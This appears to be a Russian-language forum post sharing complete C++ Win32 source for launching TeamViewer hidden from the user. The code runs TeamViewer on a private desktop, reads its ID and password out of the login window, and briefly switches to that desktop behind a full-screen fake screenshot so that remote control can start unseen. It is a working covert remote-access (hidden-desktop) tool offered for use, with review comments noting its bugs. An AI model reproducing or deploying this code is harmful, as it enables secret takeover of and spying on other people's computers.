
Скрытый запуск teamviewer (запускаем TeamViewer самостоятельно)

Вот код (C++, Win32). Строго говоря, это не эксплойт уязвимости, а злоупотребление API рабочих столов Windows: TeamViewer запускается на отдельном скрытом рабочем столе, а ID и пароль считываются из Edit-полей окна входа через WM_GETTEXT:

Код:
#include <windows.h>
#include <tlhelp32.h>


// Name of the private desktop created in WinMainCRTStartup. It is passed to
// CreateDesktop and set as STARTUPINFO.lpDesktop for both spawned processes,
// so it is a fixed, host-visible artifact of this tool.
#define TV_DESKTOP_NAME       TEXT("MyNewTVDesktop")   
// Window class registered for the full-screen decoy window (MakeFullscreenFakeWnd).
#define FAKEWND_CLASS       TEXT("vsfldlxcalm")

// RawSize == 0; .bss
// Two 256-TCHAR slots written by DumpLogonFields: [0] is the first "Edit"
// control read (reported as "id"), [1] the second (reported as "key").
static TCHAR g_login_fields[2][256];
// Main TeamViewer window, found by title with FindWindow on the private desktop.
static HWND   g_mainTVwnd;
// Screenshot of the original desktop; FakeWndProc paints it on the decoy window.
static HBITMAP g_fakeScreen;


// Terminate the process with exit status `code`. When `reason` is non-NULL it
// is written to the debugger output first. Never returns.
static void my_exit(UINT code, LPCTSTR reason = NULL)
{
    if (reason != NULL) {
        OutputDebugString(reason);
    }
    ExitProcess(code);
}


// Window procedure for the decoy window. Everything except WM_PAINT is handed
// to DefWindowProc; WM_PAINT copies g_fakeScreen (the screenshot of the original
// desktop) 1:1 onto the window at its bitmap's own size. Return values of the
// GDI calls are not checked, as in the original.
static LRESULT CALLBACK FakeWndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    if (message != WM_PAINT)
        return DefWindowProc(hWnd, message, wParam, lParam);

    PAINTSTRUCT ps;
    HDC target = BeginPaint(hWnd, &ps);

    // Temporary memory DC with the screenshot selected in, so BitBlt can copy it.
    HDC source = CreateCompatibleDC(target);
    HGDIOBJ previous = SelectObject(source, g_fakeScreen);

    BITMAP info;
    GetObject(g_fakeScreen, sizeof(info), &info);
    BitBlt(target, 0, 0, info.bmWidth, info.bmHeight, source, 0, 0, SRCCOPY);

    SelectObject(source, previous);
    DeleteDC(source);

    EndPaint(hWnd, &ps);
    return 0;
}


// Thread entry for the decoy window. `desk` is the HDESK of the private
// desktop: the thread attaches to it first, because the class and window are
// created on the calling thread's desktop. The window is a borderless popup the
// size of the primary screen, kept topmost; FakeWndProc paints g_fakeScreen on
// it. Nothing here posts WM_QUIT, so the loop runs until the process exits.
static DWORD WINAPI MakeFullscreenFakeWnd(LPVOID desk)
{
   SetThreadDesktop((HDESK)desk);

   WNDCLASSEX wcex;

   wcex.cbSize = sizeof(WNDCLASSEX);

   wcex.style           = CS_HREDRAW | CS_VREDRAW;
   wcex.lpfnWndProc   = FakeWndProc;
   wcex.cbClsExtra       = 0;
   wcex.cbWndExtra       = 0;
   wcex.hInstance       = GetModuleHandle(0);
   wcex.hIcon           = NULL;   // no icon resource is used
   wcex.hCursor       = LoadCursor(NULL, IDC_ARROW);
   wcex.hbrBackground   = (HBRUSH)(COLOR_WINDOW+1);
   wcex.lpszMenuName   = NULL;   // no menu resource is used
   wcex.lpszClassName   = FAKEWND_CLASS;
   wcex.hIconSm       = NULL;   // no small icon resource is used

   // NOTE(review): neither RegisterClassEx nor CreateWindow is checked for failure.
   RegisterClassEx(&wcex);

   HWND hWnd;
   hWnd = CreateWindow(FAKEWND_CLASS, NULL, WS_POPUP,  0, 0, GetSystemMetrics(SM_CXSCREEN),
                       GetSystemMetrics(SM_CYSCREEN),  NULL, NULL, GetModuleHandle(0), NULL);

   ShowWindow(hWnd, SW_SHOWMAXIMIZED);
   SetWindowPos(hWnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE);
   UpdateWindow(hWnd);

   MSG msg;

   // Message loop filtered to this window only. NOTE(review): per the GetMessage
   // contract an invalid hWnd makes it return -1, which this condition treats as
   // true, so a failed CreateWindow would spin here rather than exit — confirm.
   while(GetMessage(&msg, hWnd, 0, 0))
       DispatchMessage(&msg);

   ExitThread(0);
}


// Capture the "DISPLAY" device into a new device-dependent bitmap of the
// device's HORZRES x VERTRES size. The caller owns the returned HBITMAP.
// No GDI return value is checked; a failed CreateCompatibleBitmap would make
// the BitBlt a no-op and the function return NULL.
static HBITMAP GetScreenshotHBitmap()
{
    HDC screenDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL);
    HDC memDC = CreateCompatibleDC(screenDC);

    const int width = GetDeviceCaps(screenDC, HORZRES);
    const int height = GetDeviceCaps(screenDC, VERTRES);

    HBITMAP shot = CreateCompatibleBitmap(screenDC, width, height);
    HGDIOBJ previous = SelectObject(memDC, shot);

    BitBlt(memDC, 0, 0, width, height, screenDC, 0, 0, SRCCOPY);

    // Restore the DC's stock bitmap before deleting the DC; `shot` stays valid.
    SelectObject(memDC, previous);

    DeleteDC(memDC);
    DeleteDC(screenDC);

    return shot;
}


// EnumChildWindows callback: copies the text of the first two "Edit" controls it
// meets into g_login_fields[0] and [1], then returns FALSE to stop enumerating.
// `lParam` is unused. Which two controls these are, and whether the second is a
// password-style control, is not established here — the caller labels them
// "id" and "key".
static BOOL CALLBACK DumpLogonFields(_In_ HWND   hwnd, _In_ LPARAM lParam)
{
   TCHAR str[256];
   // NOTE(review): GetClassName takes a TCHAR count; sizeof() yields bytes, so in
   // a UNICODE build the declared capacity is twice the real one.
   GetClassName(hwnd, str, sizeof(str));

   if (!lstrcmp(str, TEXT("Edit")))
   {
       // Persists across callback invocations (and across enumerations).
       static size_t filled_up(0);

       if (filled_up > 1)
           return FALSE;

       // Poll every 10 ms until the control holds at least 3 characters. There is
       // no timeout, so an Edit control that stays short blocks this callback —
       // and the whole enumeration — indefinitely.
       while (SendMessage(hwnd, WM_GETTEXTLENGTH, 0, 0) < 3)
           Sleep(10);

       // Up to 256 TCHARs including the terminator, matching the slot size.
       SendMessage(hwnd, WM_GETTEXT, 256, (LPARAM)g_login_fields[filled_up]);
       ++filled_up;
   }
  
   return TRUE;
}


// EnumChildWindows callback: for each child whose class is "CustomRunner",
// enumerate its own children with DumpLogonFields. Always returns TRUE so the
// outer enumeration continues. `lParam` is unused.
static BOOL CALLBACK DumpChildWindows(_In_ HWND hwnd, _In_ LPARAM lParam)
{
    TCHAR className[256];
    // NOTE(review): sizeof() is a byte count, but GetClassName expects TCHARs;
    // kept as in the original.
    GetClassName(hwnd, className, sizeof(className));

    const bool isRunner = (lstrcmp(className, TEXT("CustomRunner")) == 0);
    if (isRunner)
        EnumChildWindows(hwnd, DumpLogonFields, 0);

    return TRUE;
}


// EnumThreadWindows callback: descend into every top-level window of the thread
// through DumpChildWindows. Never stops the enumeration. `lParam` is unused.
static BOOL CALLBACK DumpThreadWindows(_In_ HWND   hwnd, _In_ LPARAM lParam)
{
    (void)lParam;
    EnumChildWindows(hwnd, DumpChildWindows, 0);
    return TRUE;
}


// Entry point (presumably the image is linked without the CRT, hence the name).
// Sequence, as written:
//   1. create a private desktop and attach this thread to it;
//   2. run userinit.exe with STARTUPINFO.lpDesktop = TV_DESKTOP_NAME so a shell
//      starts on that desktop, and wait for userinit's primary thread;
//   3. launch %TEMP%\TeamViewer\TeamViewer.exe --noInstallation --dre there;
//   4. wait for a window titled "TeamViewer", then walk the windows of every
//      thread of that process and copy the first two Edit controls
//      (DumpLogonFields) into g_login_fields;
//   5. return to the original desktop and show the two values in a MessageBox;
//   6. "blink": make the private desktop the input desktop for ~1 s while a
//      decoy window shows a screenshot of the original desktop, then switch back.
// Exits through my_exit; nothing is cleaned up explicitly.
extern "C" void WinMainCRTStartup()
{
   HDESK tvDesk, originalDesk;
  
   originalDesk = GetThreadDesktop(GetCurrentThreadId());
   // Author's note: DESKTOP_CREATEWINDOW | DELETE did not work, hence GENERIC_ALL.
   // NOTE(review): the CreateDesktop result is not checked; a NULL HDESK would
   // silently leave everything on the original desktop.
   tvDesk = CreateDesktop(TV_DESKTOP_NAME, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL);

   SetThreadDesktop(tvDesk);

   // Aggregate init: cb, lpReserved, lpDesktop — the last one routes both
   // CreateProcess calls below onto the private desktop.
   STARTUPINFO            si{sizeof(STARTUPINFO), NULL, TV_DESKTOP_NAME};
   PROCESS_INFORMATION       pi;
   TCHAR                   tv_cmdpath[MAX_PATH], userinit_path[MAX_PATH];

    ExpandEnvironmentStrings(TEXT("%windir%\\system32\\userinit.exe"), userinit_path, MAX_PATH-1);
   // NOTE(review): on failure `pi` is left uninitialized, yet pi.hThread is
   // waited on right after; the pi handles are also never closed.
   if (!CreateProcess(userinit_path, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
       OutputDebugString(TEXT("Shell is not spawned!"));
   WaitForSingleObject(pi.hThread, INFINITE);

   // NOTE(review): GetTempPath takes a TCHAR count; sizeof() is bytes (2x in a
   // UNICODE build). lstrcat is unbounded, so a long %TEMP% plus the ~50-char
   // suffix can overrun the MAX_PATH buffer.
   GetTempPath(sizeof(tv_cmdpath), tv_cmdpath);
   lstrcat(tv_cmdpath, TEXT("TeamViewer\\TeamViewer.exe  --noInstallation --dre"));

   // NOTE(review): lpApplicationName is NULL and the path is unquoted, so if
   // %TEMP% contains spaces CreateProcess parses the command line ambiguously.
   if (!CreateProcess(NULL, tv_cmdpath, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
       my_exit(1, TEXT("No TV dir in appdata/local/temp detected! exiting."));

   // Poll once a second for the TeamViewer window on the private desktop; the
   // thread must stay attached to it for FindWindow to see that window. There
   // is no timeout.
   while(1)
   {
       if(NULL != (g_mainTVwnd = FindWindow(NULL, TEXT("TeamViewer"))))
           break;
      
       Sleep(1000);
   }

   THREADENTRY32 trd_e{sizeof(trd_e)};
   HANDLE thr_list(CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0));

   if (INVALID_HANDLE_VALUE == thr_list)
       my_exit(2, TEXT("cant retrieve thread list snap!"));

   // NOTE(review): Thread32First's result is not checked before the loop.
   Thread32First(thr_list, &trd_e);
  
   // One pass over the snapshot: for each thread of the TeamViewer process,
   // enumerate its windows. The loop ends when the snapshot is exhausted or as
   // soon as the second field is non-empty; the snapshot is never retaken.
   do
   {
       if (trd_e.th32OwnerProcessID == pi.dwProcessId)
       {
           EnumThreadWindows(trd_e.th32ThreadID, DumpThreadWindows, 0);
       }
      
   } while (Thread32Next(thr_list, &trd_e) && !g_login_fields[1][0]); // stop once the second field is filled
  
   CloseHandle(thr_list);
   SetThreadDesktop(originalDesk);   // back to the original desktop to report
   // NOTE(review): tvDesk is closed here (via CloseHandle rather than
   // CloseDesktop) but is used again below by SetThreadDesktop, CreateThread
   // and SwitchDesktop; if the close succeeds those calls see a stale handle.
   CloseHandle(tvDesk);

   // NOTE(review): szReport is 128 TCHARs, but each field may hold up to 255,
   // so wsprintf can overrun this stack buffer.
   TCHAR szReport[128];
   wsprintf(szReport, TEXT("TeamViewer logon window dumped:\nid:\t%s\nkey:\t%s\n\nHit ok to switch desktop"),
               g_login_fields[0], g_login_fields[1]);

   MessageBox(0, szReport, TEXT("remote access test"), 0);
  
   //
   // Author's note: the remote-control video stream does not start until the
   // desktop is the active (input) one, so the "blink" below briefly makes the
   // private desktop active.
   //
   do
   {
       HWND hwndTray, tray_panel_wnd;

       g_fakeScreen = GetScreenshotHBitmap(); // captured while on the original desktop
      
       SetThreadDesktop(tvDesk);
      
       // A "TV tray notification" window means TeamViewer is in file-transfer
       // mode (author's comment); the blink is skipped in that case.
       if(FindWindow(TEXT("TrayNotificationBaseView"), TEXT("TV tray notification")))
           break;
      
       // Decoy thread; its handle is dropped immediately, the thread keeps running.
       CloseHandle(CreateThread(NULL, 0, MakeFullscreenFakeWnd, (LPVOID)tvDesk, 0, NULL));

       // These lookups run on the private desktop: the taskbar spawned by
       // userinit there and TeamViewer's own panel window.
       hwndTray = FindWindow(TEXT("Shell_TrayWnd"), NULL );
       tray_panel_wnd = FindWindow(TEXT("TV_ControlWin"), TEXT("TeamViewer Panel"));
              
       // Hide the taskbar and push both TeamViewer windows off-screen so only the
       // decoy screenshot is visible during the blink. The meaning of WM_COMMAND
       // id 419 for Shell_TrayWnd is not established here. None of the HWNDs
       // are NULL-checked.
       ShowWindow(hwndTray, SW_HIDE);
       MoveWindow(tray_panel_wnd, 5000, 5000, 200, 200, TRUE);   
       MoveWindow(g_mainTVwnd, 5000, 5000, 200, 200, TRUE);   
       SendMessage(hwndTray, WM_COMMAND, (WPARAM)419, 0 );       
      
       SwitchDesktop(tvDesk);
       Sleep(1000);
       // Switch back; the one-second activation above is what the author relies on.
       SwitchDesktop(originalDesk);
   }while(0);
      
  
   // ExitProcess also ends the decoy thread; the spawned processes are not touched.
   my_exit(0);           
}
Автор сорца @sn0w
 

